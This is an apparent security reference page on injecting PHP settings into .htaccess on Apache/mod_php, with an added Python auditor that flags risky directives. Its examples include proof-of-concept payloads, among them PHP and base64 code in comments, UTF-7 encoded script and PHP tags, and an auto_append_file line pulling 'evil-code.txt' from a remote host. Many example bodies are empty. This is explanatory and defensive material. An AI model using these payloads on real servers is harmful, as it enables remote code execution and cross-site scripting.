PHP htaccess
In an Apache/mod_php setup, an attacker is able to inject content into .htaccess (or php.ini, or the Apache configuration). The directory where the injection happens has AllowOverride Options set (or AllowOverride All, which is also very common).
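A defender-side check for the setup described above, added here as an example and not part of the original page: it scans a .htaccess body for the PHP settings this page's examples name (auto_append_file, auto_prepend_file, include_path, error_log, highlight colours) and for script-like text hidden in comments. The zend.script_encoding entry, the highlight.* prefix match, the function name audit_htaccess and the sample input are assumptions of this example.

```python
import re

# php.ini settings named in this page's examples, plus zend.script_encoding
# (assumption: the setting behind the UTF-7 examples).
RISKY = {
    "auto_append_file": "runs a file after every script",
    "auto_prepend_file": "runs a file before every script",
    "include_path": "redirects include/require lookups",
    "error_log": "writes error text to a chosen file",
    "zend.script_encoding": "changes how PHP source bytes are decoded",
}
PHP_SETTING = re.compile(r"^(php_value|php_flag)\s+(\S+)\s*(.*)$", re.I)
STREAM = re.compile(r"^(data:|[a-z][a-z0-9+.-]*://)", re.I)
# Plain "<?" or "<script", or "+ADw", the UTF-7 encoding of "<".
PAYLOAD = re.compile(r"<\?|<script|\+ADw", re.I)

def audit_htaccess(text):
    """Return (line_number, message) findings for one .htaccess body."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            if PAYLOAD.search(line):
                findings.append((no, "comment carries script-like text"))
            continue
        m = PHP_SETTING.match(line)
        if m:
            name, value = m.group(2).lower(), m.group(3).strip("\"' ")
            if name in RISKY or name.startswith("highlight."):
                why = RISKY.get(name, "sets source-highlighting colour")
                if STREAM.match(value):
                    why += "; value is a stream wrapper or URL"
                findings.append((no, f"{name}: {why}"))
        elif re.match(r"^SetHandler\s+application/x-httpd-php-source", line, re.I):
            findings.append((no, "SetHandler exposes PHP source"))
    return findings

# Constructed sample; the flagged lines reuse values shown on this page.
SAMPLE = """\
Options +Indexes
php_value auto_append_file https://example.com/evil-code.txt
#<?php phpinfo();
php_flag display_errors off
php_value highlight.comment "#008000"
"""

if __name__ == "__main__":
    for no, msg in audit_htaccess(SAMPLE):
        print(f"line {no}: {msg}")
```

Any finding in a directory that users or uploads can write to is a reason to review whether AllowOverride needs to include Options there at all.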
Examples
Example 1a: file inclusion
index.php: (empty)
.htaccess:
Example 1b: PHP code execution
index.php: (empty)
.htaccess:
#<?php phpinfo();
Example 1c: (direct/remote) file inclusion
index.php: (empty)
.htaccess:
;base64,PD9waHAgcGhwaW5mbygpOw==
#php_value auto_append_file data://text/plain,%3C%3Fphp+phpinfo%28%29%3B
#php_value auto_append_file https://example.com/evil-code.txt
Example 1d: XSS and PHP code execution with UTF-7
index.php: (empty)
.htaccess:
#+ADw-script+AD4-alert(1)+ADsAPA-/script+AD4 #+ADw?php phpinfo()+ADs
Example 2a: XSS via error message link
index.php: (produces error message)
.htaccess:
Example 2b: XSS via error message link extension
index.php:
.htaccess:
Example 3a: XSS via phps color
Assumption: phps source handler is activated.
<FilesMatch ".+\.phps$">
SetHandler application/x-httpd-php-source
Order Allow,Deny
Allow from all
</FilesMatch>
index.phps:
.htaccess:
Example 3b: XSS via highlight_file() color
index.php:
.htaccess:
Example 4a: failed PHP injection via error_log and include_path
In this example PHP correctly encodes HTML entities in log messages. The injection fails.
index.php:
.htaccess:
Example 4b: failed PHP injection via error_log and auto_prepend_file
index.php: (empty)
.htaccess:
Example 4c: PHP code injection via error_log and UTF-7
index.php: (empty)
.htaccess:
#---- "<?php phpinfo(); __halt_compiler();" in UTF-7:
Example 6: Source code disclosure
index.php:
.htaccess: